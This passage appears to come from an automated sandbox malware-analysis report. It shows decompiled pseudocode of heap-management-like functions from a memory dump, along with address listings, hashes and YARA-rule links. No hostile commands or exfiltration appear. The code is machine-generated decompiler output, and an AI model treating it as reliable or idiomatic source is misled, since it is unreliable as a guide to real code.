					_t47 = _t175 + 0x13fac00; // 0x6060706
					_t48 = _t123 + 0x13fac00; // 0x6070708
					_t142 = _v16;
					if(E014E2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E01432280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1506110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1506110; // 0x86d24170
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1506110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1506110 ^ _t168) & 0x7fff0000;
					}
					E014E241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}

0x014e25e6
0x014e25f6
0x014e25fb
0x014e25fe
0x014e2603
0x014e2610
0x014e2611
0x014e2613
0x014e262f
0x014e2634
0x014e2639
0x014e2641
0x014e2643
0x014e2646
0x014e2648
0x014e2649
0x014e2649
0x014e2649
0x014e2646
0x014e263b
0x014e263b
0x014e263d
0x014e263d
0x014e2639
0x014e2651
0x014e2653
0x014e2655
0x014e2657
0x014e265c
0x014e2668
0x014e266a
0x014e2675
0x014e267c
0x014e2680
0x014e2684
0x014e2687
0x014e2692
0x014e2695
0x014e2698
0x014e269d
0x014e26a2
0x014e26a4
0x014e26a4
0x014e26a8
0x014e26b2
0x014e26c0
0x014e26c6
0x014e26c9
0x014e26d1
0x014e26d4
0x014e26e2
0x014e26ea
0x014e26ed
0x014e26f1
0x014e26f6
0x014e26f9
0x014e2707
0x014e270d
0x014e2710
0x014e2713
0x014e2718
0x014e271d
0x014e271d
0x014e2722
0x014e2750
0x014e2758
0x014e275d
0x014e2760
0x014e2766
0x014e2769
0x014e276e
0x014e2771
0x014e2777
0x014e277d
0x014e2783
0x014e2791
0x014e27a7
0x014e27a9
0x014e27ab
0x014e27ab
0x014e27b1
0x014e27b4
0x014e27b4
0x014e27bc
0x014e27bf
0x014e27c2
0x014e27c2
0x014e27db
0x014e27df
0x014e27e5
0x014e27e8
0x014e27f0
0x014e27ff
0x014e27ff
0x014e27f2
0x014e27f4
0x014e27f4
0x014e281a
0x014e2824
0x014e2826
0x014e2834
0x014e2843
0x014e2858
0x014e2858
0x014e2866
0x014e2866
0x014e2873

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc01dfe559b6d4339917f4ec89ccb2e9cf86b1686d15aec345128779a1ada75
Instruction ID: 94c27d56a7f91245fa6cfee3401718a4c5c145b23b4f0acb96b18b1f8093ff39
Opcode Fuzzy Hash: 8fc01dfe559b6d4339917f4ec89ccb2e9cf86b1686d15aec345128779a1ada75
Instruction Fuzzy Hash: 24811772A001158BCF19CF79C894A7EBBF5FF88311B1A82AED815DB3A5DA30D905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014E1D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E014E1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x14f1070);
				E0146D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E014E337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E014E33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E014596E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E014E33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0144E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1505880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E0144DFDF(_t91, 1, _t142);
					}
					return E0146D0D1(_t103);
				}
			}

0x014e1d55
0x014e1d55
0x014e1d57
0x014e1d5c
0x014e1d63
0x014e1d66
0x014e1d69
0x014e1d6c
0x014e1d6e
0x014e1d71
0x014e1d74
0x014e1d77
0x014e1d7a
0x014e1d7d
0x014e1d82
0x014e1d85
0x014e1d88
0x014e1d8d
0x014e1d90
0x014e1d94
0x014e1d96
0x014e1d98
0x014e1d98
0x014e1d9b
0x014e1d9e
0x00000000
0x014e1da1
0x014e1da5
0x014e1e78
0x014e1e78
0x014e1e82
0x014e1e87
0x014e1e8a
0x014e1e8d
0x014e1e92
0x014e1e95
0x014e1e98
0x014e1e9b
0x014e1ede
0x014e1ee3
0x014e1ee8
0x014e1ef2
0x014e1ef2
0x014e1ef5
0x014e1ef8
0x014e1efe
0x014e1f03
0x00000000
0x014e1f09
0x014e1f0c
0x014e1f0e
0x014e1f11
0x00000000
0x014e1f17
0x014e1f17
0x014e1f1a
0x014e1f31
0x014e1f34
0x014e1f3f
0x014e1f42
0x014e1f45
0x014e1f47
0x014e1f4a
0x014e1f4d
0x014e1f4f
0x014e1f63
0x014e1f65
0x014e1f67
0x00000000
0x014e1f69
0x014e1f69
0x014e1f72
0x014e1f72
0x014e1f75
0x014e1f77
0x00000000
0x00000000
0x014e1f6e
0x014e1f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x014e1f70
0x014e1f83
0x014e1f83
0x014e1f85
0x00000000
0x014e1f85
0x014e1f51
0x014e1f53
0x014e1f5a
0x014e1f5c
0x014e1f87
0x014e1f87
0x014e1f87
0x014e1f8b
0x014e1f8d
0x014e1f90
0x00000000
0x014e1f90
0x014e1f1c
0x014e1f1c
0x00000000
0x014e1f22
0x014e1f22
0x014e1f25
0x014e1f28
0x014e1f97
0x014e1f97
0x014e1f9d
0x014e1fa7
0x014e1faa
0x014e1fb1
0x014e1fb9
0x014e1fbd
0x014e1fbe
0x014e1fc0
0x014e1f2a
0x014e1f93
0x014e1f93
0x014e1f95
0x00000000
0x00000000
0x00000000
0x00000000
0x014e1f95
0x014e1f28
0x014e1f1c
0x014e1f1a
0x014e1f11
0x014e1e9d
0x014e1ea0
0x014e1eae
0x014e1eb4
0x014e1ebc
0x014e1ebc
0x014e1ec2
0x014e1ec8
0x014e1ecd
0x00000000
0x014e1ed3
0x014e1ed3
0x00000000
0x014e1ed3
0x014e1ecd
0x014e1dab
0x014e1dab
0x014e1db1
0x014e1db3
0x014e1db9
0x014e1dbf
0x014e1dc2
0x014e1dda
0x014e1ddd
0x014e1de0
0x014e1de9
0x014e1dec
0x014e1def
0x014e1df1
0x014e1df3
0x014e1e0a
0x014e1e0c
0x014e1e0e
0x00000000
0x014e1e10
0x014e1e10
0x014e1e13
0x014e1e16
0x014e1e16
0x014e1e19
0x014e1e1c
0x014e1e1e
0x014e1e20
0x00000000
0x00000000
0x014e1e22
0x014e1e24
0x00000000
0x014e1e26
0x00000000
0x014e1e26
0x00000000
0x014e1e24
0x014e1e30
0x014e1e30
0x00000000
0x014e1e30
0x014e1df5
0x014e1df7
0x014e1e01
0x014e1e32
0x014e1e34
0x014e1e36
0x00000000
0x014e1e36
0x014e1dc4
0x014e1dc4
0x00000000
0x014e1dc6
0x014e1dc6
0x014e1dc9
0x014e1dcf
0x014e1dd1
0x014e1e38
0x014e1e38
0x014e1e38
0x014e1e38
0x014e1dc4
0x014e1dbb
0x014e1dbb
0x014e1dbb
0x014e1dbb
0x014e1e3a
0x014e1e3a
0x014e1e3d
0x014e1e40
0x014e1e43
0x014e1e6f
0x014e1fc7
0x014e1fc7
0x014e1e75
0x014e1e75
0x00000000
0x014e1e75
0x014e1e6f
0x014e1fca
0x014e1fca
0x014e1fce
0x014e1fd0
0x014e1fd0
0x014e1fd3
0x014e1fd9
0x014e1fde
0x014e1fe4
0x014e1fe4
0x014e1fee
0x014e1fee

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86417eb04a648d573d0cf91c82df9477e59fb5a182c155a0dafc18fe1e62d1b8
Instruction ID: e266eaa3042b893180e02e1d71a0c186da4097b4ae9547d7cecdc87d3001131b
Opcode Fuzzy Hash: 86417eb04a648d573d0cf91c82df9477e59fb5a182c155a0dafc18fe1e62d1b8
Instruction Fuzzy Hash: 6681AF70E402198FDF18CFA8C4949EDBBF1BF59725B14425EE012AB3E5DB319946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014DDBD2, Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E014DDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1506114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = E014DD016(_t119, _t183, _t119, _t78);
									E0142FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E014DC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x13faff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E0142FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E014DE018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x13faff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0145D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E014DD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E014DD8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E014DA80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}

0x014ddbdc
0x014ddbde
0x014ddbe1
0x014ddbed
0x014ddbef
0x014ddbf7
0x014ddbfd
0x014ddc00
0x014ddc04
0x014ddc07
0x014ddc0c
0x014ddd1f
0x014ddd1f
0x014ddd23
0x014ddd26
0x014ddd29
0x014ddd29
0x014ddd2c
0x014ddd32
0x014ddd35
0x00000000
0x014ddd38
0x014ddd3a
0x014ddd5d
0x014ddd63
0x014ddd69
0x014ddd6e
0x014ddd71
0x014ddd78
0x014ddd7d
0x014ddd8c
0x014ddd9e
0x014ddda0
0x014dddad
0x014dddb0
0x014dddb5
0x014dddb9
0x014dddd9
0x014dddd9
0x014dddde
0x014ddde0
0x014ddde3
0x014ddde5
0x014ddde9
0x014ddde9
0x014dddee
0x014dddf6
0x014dddf6
0x014ddd97
0x00000000
0x00000000
0x014ddd9b
0x00000000
0x014ddd9b
0x014ddd7f
0x00000000
0x014ddd7f
0x014ddd3f
0x014ddd54
0x014ddd58
0x014ddd86
0x00000000
0x014ddd86
0x00000000
0x014ddd5a
0x014ddd5a
0x014ddd5a
0x00000000
0x014ddd5a
0x014ddd3f
0x014ddd38
0x014ddc12
0x014ddc15
0x014ddc25
0x014ddc31
0x014ddc34
0x014ddc3b
0x014ddc3e
0x014ddc40
0x014ddc43
0x014ddc46
0x014ddc62
0x014ddc6b
0x014ddc6d
0x014ddc48
0x014ddc4b
0x014ddc59
0x014ddc5c
0x014ddc5c
0x014ddc72
0x014ddc78
0x014ddc7f
0x014ddc81
0x014ddc81
0x014ddc84
0x014ddc88
0x014ddc8d
0x014ddc95
0x014ddc9b
0x014ddca0
0x014ddca2
0x014ddca6
0x014ddca6
0x014ddcb0
0x014ddcd1
0x014ddcd4
0x014ddcda
0x014ddcec
0x014ddcf1
0x014ddcf6
0x014ddd0c
0x014ddd1a
0x014ddd1a
0x014ddcf6
0x00000000
0x014ddcda
0x014ddcb5
0x014ddcb6
0x014ddcc5
0x014ddcca
0x014ddcca

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a261082a0204ce257197fcc94391f0d1f60d7349ae94a53a288918d11aae4f3
Instruction ID: 05a61722215aa476d67829baa71e6adc993415bf8522ce9933f3a30aacb11c34
Opcode Fuzzy Hash: 0a261082a0204ce257197fcc94391f0d1f60d7349ae94a53a288918d11aae4f3
Instruction Fuzzy Hash: D9711771E001299FCF15DF99C890ABFBBF5EF88310B14416AE955EB394D634C946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014E28EC, Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E014E28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E01432280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x1506110; // 0x86d24170
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x1506110; // 0x86d24170
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E014E25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E0142FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x1506110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E014E2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E0142FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0145FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E014DA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E0142FFB0(_t115, _t145, _t147);
							}
							_t104 = E014E3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E01432280(_t104, _t147);
								}
								_v5 = 0xff;
								E014E2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}

0x014e28f5
0x014e28fa
0x014e28fe
0x014e2900
0x014e2906
0x014e2908
0x014e2908
0x014e290e
0x014e2915
0x014e2918
0x014e291b
0x014e291d
0x014e2920
0x014e2920
0x014e2929
0x014e292c
0x014e292f
0x014e2932
0x014e2935
0x014e2938
0x014e293d
0x014e293d
0x014e2940
